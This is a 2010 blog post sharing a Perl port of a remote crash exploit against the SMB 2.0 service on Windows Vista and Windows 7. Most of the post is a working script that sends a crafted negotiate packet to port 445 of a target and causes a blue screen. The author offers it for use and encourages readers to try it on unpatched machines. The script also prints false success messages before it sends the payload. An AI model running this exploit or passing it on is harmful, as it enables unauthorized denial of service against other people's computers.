Kamis, 22 Juli 2010

WinVista/7 SMB 2.0 BSoD Exploit! - Coded by Phizo

*This exploit is a remote BSoD vulnerability for winvista and windows 7 machines, some have been patched, and some machines haven't been patched*

Today, I was talking to my friend gotroot and I asked him if it was possible to convert this python exploit (the python version of this exploit) and convert it to Perl, so I ended up doing that with some help from him, he told me about the "use strict;" function and about "my" but the rest of the code I knew already :)

Here is the exploit code:

==============================================================
#!/usr/bin/perl

use IO::Socket;
use strict;

my $host = $ARGV[0];
if($host) {
} else {
print "#! Usage: Smb-Bsod.pl 127.0.0.1 !#\n\n\a";
exit;
}
my $port = '445';

my $payload = "\x00\x00\x00\x90".
"\xff\x53\x4d\x42".
"\x72\x00\x00\x00".
"\x00\x18\x53\xc8".
"\x00\x26".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe".
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54".
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31".
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00".
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57".
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61".
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c".
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c".
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e".
"\x30\x30\x32\x00";

my $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"$port", Timeout=>'15') || die "Exploit failed to connect to the machine.\n\n";

print "System has been successfully exploited!\n\a";
print "Attempting to inject payload...\n";
sleep(4);
print $sock "$payload";
print "Payload has been injected successfully!\n\a";
close($sock);

#coded by Phizo-
#vulnerability discovered by Laurent GaffiƩ-
==============================================================
This code is user friendly, and you should be able to use this exploit. Do not rip this and call it your own either :) I will know, because this is unique and no one else has created this exploit in perl.

Enjoy the exploit! (Some systems have patched this, but you can still try, some people don't patch :P)  

Tidak ada komentar:

Posting Komentar